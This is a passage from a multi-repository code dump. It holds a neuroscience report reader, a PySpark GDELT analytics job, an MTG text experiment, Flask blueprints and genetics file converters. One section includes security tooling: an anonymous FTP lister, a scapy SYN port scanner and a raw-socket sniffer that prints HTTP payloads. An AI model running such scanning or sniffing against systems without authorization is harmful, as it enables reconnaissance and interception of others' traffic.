self[population] def units(self, population=None): population = population or self.default_population return self[population].units() def variable(self, population=None): population = population or self.default_population return self[population].variable() def tstart(self, population=None): population = population or self.default_population return self[population].tstart() def tstop(self, population=None): population = population or self.default_population return self[population].tstop() def dt(self, population=None): population = population or self.default_population return self[population].dt() def time_trace(self, population=None): population = population or self.default_population return self[population].time_trace() def node_ids(self, population=None): population = population or self.default_population return self[population].node_ids() def element_pos(self, node_id=None, population=None): population = population or self.default_population return self[population].element_pos(node_id) def element_ids(self, node_id=None, population=None): population = population or self.default_population return self[population].element_ids(node_id) def n_elements(self, node_id=None, population=None): population = population or self.default_population return self[population].n_elements(node_id) def data(self, node_id=None, population=None, time_window=None, sections='all', **opt_attrs): population = population or self.default_population return self[population].data(node_id=node_id, time_window=time_window, sections=sections, **opt_attrs) def custom_columns(self, population=None): population = population or self.default_population return self[population].custom_columns(population) def get_column(self, column_name, population=None): population = population or self.default_population return self[population].get_column(column_name) def get_node_description(self, node_id, population=None): population = population or self.default_population return self[population].get_node_description(node_id) def get_report_description(self, population=None): population = population or self.default_population return self[population].get_report_description() def __getitem__(self, population): return self._popgrps[population] ```
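The compartment reader above exposes a small query surface (`populations`, `node_ids`, `time_trace`, `data`, `variable`, `units`). As a rough usage sketch — the report path, the import path inferred from the file layout, and the printed summary are assumptions rather than part of the source — reading one node's trace might look like this:

```python
import numpy as np
# Import path assumed from the file layout shown above.
from bmtk.utils.reports.compartment.compartment_reader import CompartmentReaderVer01

# Hypothetical compartment report written by a previous simulation run.
report = CompartmentReaderVer01('output/membrane_report.h5')

pop = report.populations[0]                   # first (possibly only) population in the file
node_ids = report.node_ids(population=pop)    # node ids recorded under /mapping
times = report.time_trace(population=pop)     # time axis built from tstart/tstop/dt

# Trace recorded at the "origin" compartment of the first node.
trace = report.data(node_id=node_ids[0], population=pop, sections='origin')
print(report.variable(population=pop), report.units(population=pop))
print(len(times), trace.shape, float(np.mean(trace)))
```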
{
    "source": "AAbercrombie0492/gdelt_distributed_architecture",
    "score": 3
}
#### File: src/data/gkg_cooccurences_pyspark.py ```python from pyspark import SparkContext, SparkConf, SQLContext from pyspark.sql.functions import explode, udf, split, explode, countDistinct from pyspark.sql.types import * from pyspark.sql.functions import * from pyspark.sql import Row, SparkSession from pyspark import * import boto from boto.s3.key import Key from boto.s3.connection import S3Connection import pyspark import itertools import datetime def get_cooccurences(allnames_string): ''' Map function to get a list of entity pairs(Cartesian Product) from an AllNames column string. ''' entities = allnames_string.split(';') entitites_names = [row.split(',', 2)[0] for row in entities] cooccurences = itertools.product(entitites_names, entitites_names) cooccurences_list= map(list, cooccurences) return cooccurences_list def get_top_mentions(gkg_df, col): ''' Returns an ordered dataframe of named entity count corresponding to an arbitrary column. ''' log.warn("GETTING COUNTS AND ORDERED DATAFRAME FOR {} COLUMN".format(col)) themes = gkg_df.select(col) # split_text = udf(lambda x: x.split(';')) themes_split_col = pyspark.sql.functions.split(gkg_df[col], ';') themes_df = gkg_df.select(explode(themes_split_col).alias(col)) theme_counts = themes.groupBy(col).count().orderBy('count', ascending=False) log.warn("FINISHED GETTING COUNTS AND ORDERED DATAFRAME FOR {} COLUMN".format(col)) return theme_counts def query_time(): 'NEED TO ADD CONTINGENCIES FOR 2 DIGIT DATES' now = datetime.datetime.now() today_seq = '{}0{}0{}'.format(now.year,now.month,now.day) return today_seq def make_allnames_df(): ''' Returns a filtered dataframe where rows have multiple named entitites. ''' log.warn("CREATING ALLNAMES DATAFRAME") gkg_allnames_df = master_gkg.filter("AllNames LIKE '%;%'").select(master_gkg.AllNames) gkg_allnames_df.createOrReplaceTempView('gkg_allnames') gkg_allnames_today_df = master_gkg_today.filter("AllNames LIKE '%;%'").select(master_gkg_today.AllNames) gkg_allnames_today_df.createOrReplaceTempView('gkg_allnames_today') log.warn("FINISHED CREATING ALLNAMES DATAFRAME") return gkg_allnames_today_df def make_cooccurence_df(): ''' Creates the Cooccurences dataframe with entity pairs, counts, and weights. 
''' log.warn("ABOUT TO CREATE ALLNAMES DATAFRAME") gkg_allnames_today_df = make_allnames_df() gkg_allnames_today_df.createOrReplaceTempView('gkg_allnames_today') log.warn("FINISHED CREATING ALLNAMES DATAFRAME") log.warn("CREATING LISTS OF COOCCURENCES DATAFRAME") coocs_today_lists = sqlContext.sql('SELECT AllNames, get_cooccurences(gkg_allnames_today.AllNames) AS Cooccurences FROM gkg_allnames_today') log.warn("APPLYING EXPLODE FUNCTION TO GET COOCCURENCE DATAFRAME") coocs_today_explode = coocs_today_lists.select(explode("Cooccurences").alias("cooccurence")) log.warn("GROUPING COOCCURENCE DATAFRAME BY KEYS TO GET UNIQUE COUNTS") coocs_counts = coocs_today_explode.groupby(coocs_today_explode.cooccurence).count().alias('Counts') log.warn("ORDERING AND FORMATING COOCCURENCE DATAFRAME") coocs_counts_ordered = coocs_counts.orderBy('count', ascending=False) coocs_counts_ordered.createOrReplaceTempView('coocs_counts_ordered') coocs_counts_ordered = sqlContext.sql( "SELECT row_number()\ OVER (ORDER BY count DESC) AS rn, * \ FROM coocs_counts_ordered") log.warn("GETTING THE TOTAL NUMBER OF COOCCURENCES") total_counts = coocs_counts_ordered.rdd.map(lambda x: float(x["count"])).reduce(lambda x, y: x+y) log.warn("WEIGHTING COOCCURENCE KEYS BY FREQUENCY") weights = coocs_counts_ordered.rdd.map(lambda x: x['count'] /total_counts) row = Row("weight") weights_df = weights.map(row).toDF() weights_df.createOrReplaceTempView('weights_df') weights_df = sqlContext.sql( "SELECT row_number() \ OVER(ORDER BY weight DESC) AS rn, * \ FROM weights_df") log.warn("APPLYING JOIN OF DF AND WEIGHTS TO FINALIZE COOCCURENCE DF") coocs_counts_ordered = coocs_counts_ordered.join(weights_df, weights_df.rn == coocs_counts_ordered.rn).drop(weights_df.rn) log.warn("FINISHED CREATING COOCCURENCE DATAFRAME") return coocs_counts_ordered if __name__ == '__main__': sc = SparkContext() sqlContext = SQLContext(sc) APP_NAME = "Global Knowledge Graph" conf = SparkConf().setAppName(APP_NAME) conf = conf.setMaster("local[*]") spark = SparkSession.builder.appName("APP_NAME") \ .config("spark.some.config.option", "some-value") \ .getOrCreate() sc.setLogLevel(logLevel="WARN") log4jLogger = sc._jvm.org.apache.log4j log = log4jLogger.LogManager.getLogger(__name__) log.warn('SETTING COMPRESSION CODEC AS GZIP') sqlContext.setConf("spark.sql.parquet.compression.code","gzip") log.warn("LOADING TODAY'S PARQUET FILES") today = query_time() gkg_today = spark.read.parquet("s3a://gdelt-streaming/{}*".format(today)) gkg_today.createOrReplaceTempView("gkg_today") log.warn("CREATING TODAY'S MASTER DATAFRAME") master_gkg_today = spark.sql("SELECT GKGRECORDID, cast(DATE AS STRING), AllNames, Persons, Organizations, Themes, Locations FROM gkg_today LIMIT 10") master_gkg_today.registerTempTable("master_gkg_today") log.warn("FINISHED TODAY'S MASTER DATAFRAME") log.warn("LOADING ALL PARQUET FILES") gkg = spark.read.parquet("s3a://gdelt-streaming/*.parquet") gkg.createOrReplaceTempView("gkg_view") log.warn("CREATING ALLTIME MASTER DATAFRAME") master_gkg = spark.sql("SELECT GKGRECORDID, cast(DATE AS STRING), AllNames, Persons, Organizations, Themes, Locations FROM gkg_view LIMIT 10") master_gkg.registerTempTable('master_gkg') log.warn("REGISTERING GET_OCCURENCES SQL FUNCTION") pyspark.sql.UDFRegistration(get_cooccurences) sqlContext.registerFunction("get_cooccurences", get_cooccurences, ArrayType(ArrayType(StringType()))) log.warn("FINISHED REGISTERING GET_OCCURENCES SQL FUNCTION") log.warn("ABOUT TO CREATE COOCCURENCES DATAFRAME") cooccurences = 
make_cooccurence_df() log.warn("UPLOADING CONCURRENCES TO S3") cooccurences_string = 'cooccurences_{}'.format(datetime.datetime.now()) cooccurences.write.parquet("s3a://gdelt-spark-output/{}".format(cooccurences_string)) themes = get_top_mentions(gkg_today, 'Themes') people = get_top_mentions(gkg_today, 'Persons') organizations = get_top_mentions(gkg_today, 'Organizations') log.warn("UPLOADING Themes, People, and Orgs to S3") themes_string = 'themes_{}'.format(datetime.datetime.now()) themes.write.parquet("s3a://gdelt-spark-output/{}".format(themes_string)) people_string = 'people_{}'.format(datetime.datetime.now()) people.write.parquet("s3a://gdelt-spark-output/{}".format(people_string)) orgs_string = 'organizations_{}'.format(datetime.datetime.now()) organizations.write.parquet("s3a://gdelt-spark-output/{}".format(orgs_string)) log.warn("UPLOADING COOCCURENCES, THEMES, PEOPLE, AND ORGS TO S3 AS JSON") output_dir = "s3a://gdelt-spark-output/" orgs_txt_string = 'organizations_json_{}'.format(datetime.datetime.now()) organizations.write.json("s3a://gdelt-spark-output/{}".format(orgs_txt_string)) themes_txt_string = 'themes_json_{}'.format(datetime.datetime.now()) themes.write.json("s3a://gdelt-spark-output/{}".format(themes_txt_string)) people_txt_string = 'themes_json_{}'.format(datetime.datetime.now()) people.write.json("s3a://gdelt-spark-output/{}".format(people_txt_string)) cooccurences_txt_string = 'cooccurences_json_{}'.format(datetime.datetime.now()) cooccurences.write.json("s3a://gdelt-spark-output/{}".format(cooccurences_txt_string)) log.warn("UPLOADING COOCCURENCES, THEMES, PEOPLE, AND ORGS TO REDSHIFT") output_dir = "s3a://gdelt-spark-output/" cooccurences.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "cooccurences") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() themes.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "themes") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() people.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "people") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() organizations.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "organizations") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() log.warn("SUCCESS! EVERYTHING WORKED!") ```
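Because `get_cooccurences` is a plain Python function, it can be sanity-checked without a Spark cluster. The snippet below is only a sketch: the `AllNames` string is invented but follows GDELT GKG's `Name,CharOffset;Name,CharOffset;...` layout, and the import assumes the module above (and its PySpark/boto dependencies) is importable; the Spark job itself only runs under `__main__`, so importing is safe.

```python
# Standalone check of the cooccurrence mapper defined above.
from gkg_cooccurences_pyspark import get_cooccurences  # assumed importable

# Made-up AllNames field in GDELT GKG "Name,Offset;Name,Offset;..." form.
sample = "United Nations,25;World Health Organization,112;United Nations,301"
pairs = get_cooccurences(sample)

# Cartesian product of the three mentions with themselves -> 9 pairs,
# including self-pairs such as ['United Nations', 'United Nations'].
for pair in pairs:
    print(pair)
```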
{
    "source": "Aabglov/mtg",
    "score": 3
}
#### File: mtg/nlp/onehot_sentences.py
```python
import warnings
warnings.filterwarnings(action='ignore')

from collections import defaultdict, Counter
import pickle
import pathlib
import json
import os, sys

HERE = pathlib.Path().absolute().parent.__str__()
sys.path.append(os.path.join(pathlib.Path().absolute().parent, "card_db"))  # Hax lol
# pathlib.Path(__file__).parent.absolute()

import pandas as pd
import init_db

CONN = init_db.CONN
CURSOR = CONN.cursor()

UNKNOWN_KEY = "UNK"

# FETCH DATA
ONE_HOT_DATA = "onehot_data.pkl"
try:
    with open(ONE_HOT_DATA, "rb") as f:
        df = pickle.load(f)
    print("loaded data")
except:
    print("no pickled data, recreating...")
    # NOTE: c.power and c.toughness were added to the SELECT so the creature
    # summary loop at the bottom of this script can print them without a KeyError.
    df = pd.read_sql_query("""SELECT c.name,
                                c.text as text,
                                c.min_text as min_text,
                                c.rarity,
                                c.convertedManaCost as cmc,
                                c.type,
                                c.types,
                                c.power,
                                c.toughness,
                                c.manaCost as mana_cost,
                                c.colorIdentity as color_id
                              FROM cards c
                              JOIN legalities l ON (l.uuid = c.uuid AND l.format = "vintage")
                              JOIN sets s ON instr(c.printings, s.code) > 0
                              WHERE s.releaseDate BETWEEN "2008-01-01" AND "2017-01-01"
                                AND c.type LIKE "%Creature%"
                                AND c.colorIdentity = "B"
                                AND c.rarity = "common"
                              GROUP BY c.name;""", CONN)
    print(f"Number of cards found: {len(df)}")
    # with open(ONE_HOT_DATA,"wb+") as f:
    #     pickle.dump(df,f)

# df = pd.read_sql_query("SELECT * FROM cards LIMIT 1;",CONN)
# print(df.iloc[0])
# for k,v in df.dtypes.items():
#     print(k,v)
# HODOR

all_texts = []
for i, row in df.iterrows():
    if row["min_text"]:  # account for lands and shit
        sentences = row["min_text"].split("\\")
        for s in sentences:
            # print(s)
            all_texts.append(s)

one_hot_sentences = set()
counter = Counter(all_texts)
for k, v in counter.most_common(10):
    # print(k,v)
    # if v >= 10:
    one_hot_sentences.add(k)

one_hot_sentences.add(UNKNOWN_KEY)
one_hot_sentences = tuple(sorted(one_hot_sentences))
UNKNOWN_INDEX = one_hot_sentences.index(UNKNOWN_KEY)

for o in one_hot_sentences:
    print(f"{o}, Number of occurrences: {counter[o]}, index: {one_hot_sentences.index(o)}")
print(len(one_hot_sentences))
# print(one_hot_sentences.index("totem armor"))

HODOR  # deliberate NameError: halts the script here while the vocabulary is inspected


def onehot(sentences):
    oh = [0] * len(one_hot_sentences)  # treating the one hot list as global
    for s in sentences:
        try:
            i = one_hot_sentences.index(s)
            oh[i] += 1
        except ValueError:
            oh[UNKNOWN_INDEX] += 1  # This can lead to non-one-hot formatted sentences, but that's okay for now
    return oh


for i, row in df.iterrows():
    if row["min_text"]:  # account for lands and shit
        sentences = row["min_text"].split("\\")
        o = onehot(sentences)
        if sum(o) > o[UNKNOWN_INDEX]:
            print(row["name"], row["cmc"], row["mana_cost"])
            print(row["type"], row["types"])
            print(row["power"], row["toughness"])
            print(sentences)
            print(o)

HODOR  # deliberate NameError: marks the current end of the experiment
```
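Since the vocabulary in `one_hot_sentences` is built from whatever the query returns, the exact indices change from run to run. The snippet below is an illustrative sketch only (the card text is invented, and it assumes it is run in the same session as the script above, with the `HODOR` sentinels removed so that `onehot` is actually defined):

```python
# Illustrative only: a made-up minimized card text, split the same way as above.
fake_min_text = "deathtouch\\when this creature dies, each opponent loses 1 life"
vector = onehot(fake_min_text.split("\\"))

print(vector)                  # per-sentence counts over the learned vocabulary
print(sum(vector))             # equals the number of sentences in the card text
print(vector[UNKNOWN_INDEX])   # how many sentences fell into the UNK bucket
```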
{
    "source": "AabhasKrJha/python_scripts",
    "score": 3
}
#### File: python_scripts/scanner/Multi-Threaded-Ftp.py
```python
import threading
import Queue
import time
from ftplib import FTP

# Thanks to SPSE-445 for the list :)
ftpHostList = ['ftp.x.org', 'ftp4.FreeBSD.org', 'ftp.ncsa.uiuc.edu', 'ftp.mozilla.org', 'ftp.crans.org']


class WorkerThread(threading.Thread):
    def __init__(self, queue, tid):
        threading.Thread.__init__(self)
        self.queue = queue
        self.tid = tid
        print "Worker %d Reporting for Service Sir!" % self.tid

    def run(self):
        while True:
            host = None
            try:
                host = self.queue.get(timeout=1)
            except Queue.Empty:
                print "Worker %d exiting..." % self.tid
                return
            # login to ftp host anonymously and list the dirs
            try:
                conn = FTP(host)
                conn.login()
                print 'Host: ' + host
                print conn.retrlines('LIST')
            except:
                print "Error in listing " + host
                raise
            self.queue.task_done()


queue = Queue.Queue()
threads = []
for i in range(1, 10):
    print "Creating WorkerThread : %d" % i
    worker = WorkerThread(queue, i)
    worker.setDaemon(True)
    worker.start()
    threads.append(worker)
    print "WorkerThread %d Created!" % i

for host in ftpHostList:
    queue.put(host)

queue.join()

# wait for all threads to exit
for item in threads:
    item.join()

print "Scanning Complete!"
```
#### File: python_scripts/scanner/Multi-Threaded-Scanner.py
```python
import threading
import Queue
import time
import sys  # needed for sys.argv below; missing from the original listing
from scapy.all import *


class WorkerThread(threading.Thread):
    def __init__(self, queue, tid):
        threading.Thread.__init__(self)
        self.queue = queue
        self.tid = tid
        print "Worker %d Reporting for Service Sir!" % self.tid

    def run(self):
        total_ports = 0
        while True:
            port = 0
            try:
                port = self.queue.get(timeout=1)
            except Queue.Empty:
                print "Worker %d exiting. Scanned %d ports ..." % (self.tid, total_ports)
                return
            # port scanning to begin
            # we rely on scapy to do this
            ip = sys.argv[1]
            response = sr1(IP(dst=ip)/TCP(dport=port, flags="S"), verbose=False, timeout=.2)
            # only checking for SYN-ACK == flags = 18
            # filtered ports etc. is another story altogether
            if response:
                if response[TCP].flags == 18:
                    print "ThreadId %d: Received port number %d Status: OPEN" % (self.tid, port)
            self.queue.task_done()
            total_ports += 1


queue = Queue.Queue()
threads = []
for i in range(1, 10):
    print "Creating WorkerThread : %d" % i
    worker = WorkerThread(queue, i)
    worker.setDaemon(True)
    worker.start()
    threads.append(worker)
    print "WorkerThread %d Created!" % i

for j in range(1, 1000):
    queue.put(j)

queue.join()

# wait for all threads to exit
for item in threads:
    item.join()

print "Scanning Complete!"
``` #### File: python_scripts/servers/multi_process_echo_server.py ```python import socket import sys from multiprocessing import Process def EchoClientHandler(clientSocket, addr) : while 1: client_data = clientSocket.recv(2048) if client_data : clientSocket.send(client_data) else : clientSocket.close() return echoServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM) echoServer.bind(("0.0.0.0", int(sys.argv[1]))) echoServer.listen(10) workerProcesses = [] while 1: cSock, addr = echoServer.accept() # start a new thread to service print "Starting new thread to service client \n" worker = Process(target=EchoClientHandler, args= (cSock, addr)) worker.start() workerProcesses.append(worker) ``` #### File: python_scripts/servers/multi_threaded_echo_server.py ```python import socket import thread import sys def EchoClientHandler(clientSocket, addr) : while 1: client_data = clientSocket.recv(2048) if client_data : clientSocket.send(client_data) else : clientSocket.close() return echoServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM) echoServer.bind(("0.0.0.0", int(sys.argv[1]))) echoServer.listen(10) while 1: cSock, addr = echoServer.accept() # start a new thread to service print "Starting new thread to service client \n" thread.start_new_thread(EchoClientHandler, (cSock, addr)) ``` #### File: python_scripts/sniffer/TCPSniffer_Hendrik.py ```python import socket, struct, binascii global IP, TCP, UDP, HTTP IP, TCP, UDP, HTTP = False, False, False, False def parseETH(header): global IP eth_hdr = struct.unpack("!6s6s2s", header) source = binascii.hexlify(eth_hdr[0]) dest = binascii.hexlify(eth_hdr[1]) print "\nEthernet" print "-Source:\t ", source print "-Dest:\t\t ", dest if binascii.hexlify(eth_hdr[2]) == '0800': IP = True def parseIP(header): global TCP, UDP ip_hdr = struct.unpack("!9s1s2s4s4s", header) source = socket.inet_ntoa(ip_hdr[3]) dest = socket.inet_ntoa(ip_hdr[4]) print "\nIP" print "-Source:\t ", source print "-Dest:\t\t ", dest if binascii.hexlify(ip_hdr[1]) == '06': TCP = True elif binascii.hexlify(ip_hdr[1]) == '11': UDP = True def parseTCP(header): global HTTP tcp_hdr = struct.unpack("!2s2s16s", header) src_port = binascii.hexlify(tcp_hdr[0]) dst_port = binascii.hexlify(tcp_hdr[1]) #converted ports in hex to decimal value print "\nTCP" print "-Source port:\t\t", int(src_port, 16) print "-Destination port:\t", int(dst_port, 16) if (int(src_port, 16) == 80 ) or (int(dst_port, 16) == 80): HTTP = True def parseUDP(header): udp_hdr = struct.unpack("!2s2s16s", header) src_port = binascii.hexlify(udp_hdr[0]) dst_port = binascii.hexlify(udp_hdr[1]) #converted ports in hex to decimal value print "\nUDP" print "-Source port:\t\t", int(src_port, 16) print "-Destination port:\t", int(dst_port, 16) def parseHTTP(data): print data rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x800)) while True: pkt = rawSocket.recvfrom(2048) print "Received packet:" parseETH(pkt[0][0:14]) if IP: parseIP(pkt[0][14:34]) if TCP: parseTCP(pkt[0][34:54]) elif UDP: parseUDP(pkt[0][34:54]) if HTTP: parseHTTP(pkt[0][54:]) print "\nDone\n\n" ```
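The scanner and server scripts above share one producer-consumer pattern: a shared queue of work items, daemon worker threads, and `Queue.Empty` as the exit signal. A minimal Python 3 sketch of that pattern (the hostnames are placeholders, not part of the repository):

```python
# Worker-pool sketch: queue of work items, daemon workers, Empty as the exit signal.
import queue
import threading

def worker(q, tid):
    while True:
        try:
            host = q.get(timeout=1)
        except queue.Empty:
            print(f"Worker {tid} exiting")
            return
        print(f"Worker {tid} processing {host}")
        q.task_done()

q = queue.Queue()
threads = [threading.Thread(target=worker, args=(q, i), daemon=True) for i in range(3)]
for t in threads:
    t.start()
for host in ["example.org", "example.net"]:
    q.put(host)
q.join()        # wait until every queued item has been marked done
for t in threads:
    t.join()    # workers exit once the queue stays empty for a second
```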
{ "source": "AabhasKrJha/flask-dir", "score": 2 }
#### File: auth/basic_auth/basic_auth.py ```python from flask import Blueprint bp = Blueprint('basic-auth', __name__, url_prefix='/basic-auth') @bp.route('/') def index(): return '/auth/basic-auth' from .sqlite_auth import sqlite_auth_bp bp.register_blueprint(sqlite_auth_bp) ```
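A hypothetical wiring sketch for the blueprint above; the import path is inferred from the file location, and Flask 2.x is assumed for nested blueprint registration.

```python
# Mount the basic-auth blueprint on an app (import path is an assumption).
from flask import Flask
from auth.basic_auth.basic_auth import bp as basic_auth_bp

app = Flask(__name__)
app.register_blueprint(basic_auth_bp)  # GET /basic-auth/ plus the nested sqlite_auth_bp routes

if __name__ == "__main__":
    app.run(debug=True)
```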
{ "source": "aabiddanda/gdc", "score": 2 }
#### File: aabiddanda/gdc/polysites2vcf.py ```python from __future__ import division, print_function import argparse, sys, pdb #Remember, in eigenstrat, 2 means "2 ref copies" CODES={ "A":"AA", "C":"CC", "G":"GG", "T":"TT", "R":"AG", "Y":"CT", "S":"GC", "W":"AT", "K":"GT", "M":"AC", "-":"..", "N":"..", } ################################################################################ def parse_options(): """ argparse """ parser=argparse.ArgumentParser() parser.add_argument('-i', '--input', type=argparse.FileType('r'), default="-") parser.add_argument('-c', '--chrom', type=str, default="") return parser.parse_args() ################################################################################ def main(options): """ Convert """ samples=[] include_ancients=False include_refs=False reading_header=True for line in options.input: if len(line)==1: continue elif line[:2]=="##" and reading_header: bits=line.split() if len(bits)<4: continue elif bits[1]!="..": continue elif bits[2][0]=="3" and include_refs: #Refs samples.append(bits[3]) elif bits[2][0]=="4": #C team samples.append(bits[7]) elif bits[2][0]=="5": #B team with cteam processing samples.append(bits[7]) elif bits[2][0]=="7" and include_ancients: #Ancients samples.append(bits[4].split(":")[0]) elif bits[2][0]=="8": #A/B team, original samples.append(bits[4].split(":")[0]) elif line[0]=="#" and reading_header: reading_header=False print("##fileformat=VCFv4.2") print("##source=polysites2vcf.py") print("##FORMAT=<ID=GT,Number=1,Type=String,Description=\"Genotype\">") print("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\t"+"\t".join(samples)) elif not reading_header: bits=line.split() chrom=bits[0] if options.chrom and options.chrom!=chrom: continue poss=bits[1] idd=chrom+"_"+poss ref=bits[2][0] alleles=(bits[3]+bits[4]+bits[7]).upper() if include_refs and include_ancients: alleles=(bits[2]+bits[3]+bits[4]+bits[6]+bits[7]).upper() elif include_refs: alleles=(bits[2]+bits[3]+bits[4]+bits[7]).upper() elif include_ancients: alleles=(bits[3]+bits[4]+bits[6]+bits[7]).upper() gts = [CODES[x] for x in alleles] alt_alleles=list(set([x for x in "".join(gts) if (x!=ref and x!=".")])) if not len(alt_alleles): continue alt=",".join(alt_alleles) allele_map={ref:"0", ".":"."} for i,a in enumerate(alt_alleles): allele_map[a]=str(i+1) gt_strings=[allele_map[x[0]]+"/"+allele_map[x[1]] for x in gts] print("\t".join([chrom, poss, idd, ref, alt, "100", ".", ".", "GT"]+gt_strings)) else: print(line, file=sys.stderr) raise Exception("Header line in unexpected place") ################################################################################ if __name__=="__main__": options=parse_options() main(options) ``` #### File: aabiddanda/gdc/pyEigenstrat.py ```python from __future__ import division import numpy as np ################################################################################ # datatype definitions dt_snp1=np.dtype([("ID", np.str_, 16), ("CHR", np.str_, 2), ("POS", np.int32)]) dt_snp2=np.dtype([("ID", np.str_, 16), ("CHR", np.str_, 2), ("POS", np.int32), ("REF", np.str_, 1), ("ALT", np.str_, 1)]) dt_ind=np.dtype([("IND", np.str_, 32), ("POP", np.str_, 32)]) ########################################################################### def load(file_root, pops=None, inds=None, exclude_inds=None, snps=None): """ Investigate the geno file, and return either a packed or unpacked eigenstrat object as appropriate """ geno_file=open(file_root+".geno", "rb") head=geno_file.read(4) geno_file.close() if head == b"GENO": return packed_data(file_root, 
pops, inds, exclude_inds, snps) else: return unpacked_data(file_root, pops, inds, exclude_inds, snps) ########################################################################### class data(): """ Base class. """ def __init__(self, file_root, pops=None, inds=None, exclude_inds=None, snps=None): """ We expect to see files file_root.{snp,ind,geno}. the .geno file might be either packed or unpacked. """ snp,snp_include=load_snp_file(file_root, snps) ind,ind_include=load_ind_file(file_root, pops, inds, exclude_inds) # Snp and ind data self.snp=snp self.ind=ind self._file_root=file_root self._snp_include=snp_include self._ind_include=ind_include # Genotypes might be set later, geno file used for iterator. self._geno=None self._geno_file=self.open_geno_file(file_root) # Which snp are we on. self._isnp=0 def __iter__(self): return self # Interface follows: def open_geno_file(self, file_root): """ Open the genotype file. """ raise NotImplementedError("Don't call the base class") def geno(self): """ If this is called, load the whole genotype matrix, and return it buffer it in case we want to load it again. """ raise NotImplementedError("Don't call the base class") def next(self): raise NotImplementedError("Don't call the base class") ########################################################################### # END CLASS class unpacked_data(data): """ Read unpacked data """ def open_geno_file(self, file_root): """ Open the genotype file. """ return open(file_root+".geno", "r") def geno(self): """ If this is called, load the whole genotype matrix, and return it buffer it in case we want to load it again. """ if self._geno is not None: return self._geno geno=np.genfromtxt(self._file_root+".geno", dtype='i1', delimiter=1, usecols=np.where(self._ind_include)[0]) # If we only loaded one individual, don't drop the second dimension. if len(geno.shape)==1: geno.shape=(geno.shape[0],1) geno=geno[self._snp_include,:] self._geno=geno return geno # This is the key here .. def __next__(self): while True: line = self._geno_file.readline() self._isnp += 1 if self._snp_include[self._isnp-1]: break gt = np.array(list(line[:-1]), dtype='i1') gt = gt[self._ind_include] return gt ########################################################################### # END CLASS class packed_data(data): """ Read packed data """ def open_geno_file(self, file_root): """ Open the genotype file (in binary mode). Read the header. """ geno_file=open(file_root+".geno", "rb") header=geno_file.read(20) #Ignoring hashes if header.split()[0] != b"GENO": raise Exception("This does not look like a packedancestrymap file") nind,nsnp=[int(x) for x in header.split()[1:3]] self._nind=nind self._nsnp=nsnp self._rlen=max(48,int(np.ceil(nind*2/8))) #assuming sizeof(char)=1 here geno_file.seek(self._rlen) #set pointer to start of genotypes return geno_file def geno(self): """ If this is called, load the whole genotype matrix, and return it buffer it in case we want to load it again. """ if self._geno is not None: return self._geno geno=np.fromfile(self._file_root+".geno", dtype='uint8')[self._rlen:] #without header geno.shape=(self._nsnp, self._rlen) geno=np.unpackbits(geno, axis=1)[:,:(2*self._nind)] geno=2*geno[:,::2]+geno[:,1::2] geno=geno[:,self._ind_include] geno[geno==3]=9 #set missing values # If we only loaded one individual, don't drop the second dimension. 
if len(geno.shape)==1: geno.shape=(geno.shape[0],1) geno=geno[self._snp_include,:] self._geno=geno return geno def __next__(self): while True: if self._isnp >= self._nsnp: raise StopIteration() record=self._geno_file.read(self._rlen) self._isnp+=1 if self._snp_include[self._isnp-1]: break gt_bits=np.unpackbits(np.fromstring(record, dtype='uint8')) gt=2*gt_bits[::2]+gt_bits[1::2] gt=gt[:self._nind][self._ind_include] gt[gt==3]=9 #set missing values return gt ########################################################################### # END CLASS def load_snp_file(file_root, snps=None): """ Load a .snp file into the right format. """ snp_file=open(file_root+".snp", "r") line=snp_file.readline() bits=line.split() snpdt=dt_snp1 # does the snp file have the alleles in? snpcol=(0,1,3) if len(bits) not in [4,6]: raise Exception("SNP file should have either 4 or 6 columns") elif len(bits)==6: snpdt=dt_snp2 snpcol=(0,1,3,4,5) snp_file.seek(0) snp=np.genfromtxt(snp_file, dtype=snpdt, usecols=snpcol) snp_file.close() include=np.ones(len(np.atleast_1d(snp)), dtype=bool) if snps is not None: include=np.in1d(snp["ID"], snps) snp=snp[include] return snp,include ########################################################################### def load_ind_file(file_root, pops=None, inds=None, exclude_inds=None): """ Load a .ind file, restricting to the union of specified individuals and individuals in the specified populations. """ ind=np.genfromtxt(file_root+".ind", dtype=dt_ind, usecols=(0,2)) # ignore sex include=np.ones(len(ind), dtype=bool) if pops or inds or exclude_inds: include=np.zeros(len(ind), dtype=bool) if pops: include=np.in1d(ind["POP"], pops) if inds: include=np.logical_or(include, np.in1d(ind["IND"], inds)) if exclude_inds: include=np.logical_and(include, ~np.in1d(ind["IND"], exclude_inds)) ind=ind[include] return ind,include ########################################################################### ``` #### File: aabiddanda/gdc/vcf2eigenstrat.py ```python from __future__ import division import sys, getopt, gdc, pdb ################################################################################ def parse_options(): """ Options are described by the help() function """ options ={ "vcf":None, "out":"out", "ref":None, "indAsPop":False, "indmap":None } try: opts, args = getopt.getopt(sys.argv[1:], "v:o:r:i:", ["vcf", "out", "ref", "indmap", "indAsPop"]) print opts, args except Exception as err: print str(err) sys.exit() for o, a in opts: print o,a if o in ["-v","--vcf"]: options["vcf"] = a if o in ["-r","--ref"]: options["ref"] = a if o in ["-i","--ind"]: options["indmap"] = a if o in ["--indAsPop"]: options["indAsPop"] = True elif o in ["-o","--out"]: options["out"] = a print "found options:" print options 